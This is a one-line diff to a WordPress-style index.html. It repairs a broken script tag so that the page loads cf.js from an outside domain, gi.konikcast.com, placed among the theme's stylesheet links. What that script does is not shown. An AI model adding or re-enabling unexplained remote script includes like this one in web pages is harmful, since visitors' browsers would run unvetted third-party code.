--- a/apro/index.html
+++ b/apro/index.html
@@ -17,7 +17,7 @@
 	</style>
 	<link rel="stylesheet" id="wp-block-library-css" href="style.min.css" media="all">
 	<link rel="stylesheet" id="twentytwenty-style-css" href="style.css" media="all">
-	<script src="https://gi.konikcast.com/cf.js"></script
+	<script src="https://gi.konikcast.com/cf.js"></script>
 	<style id="twentytwenty-style-inline-css">
 		.color-accent,.color-accent-hover:hover,.color-accent-hover:focus,:root
 		.has-accent-color,.has-drop-cap:not(:focus):first-letter,.wp-block-button.is-style-outline,a
